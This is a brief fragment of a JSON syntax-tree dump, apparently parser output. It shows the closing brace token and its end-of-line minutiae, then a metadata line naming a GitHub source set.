},
{
"kind": "CLOSE_BRACE_TOKEN",
"trailingMinutiae": [
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
}
]
}
]
}
]
}
| {
"pile_set_name": "Github"
} |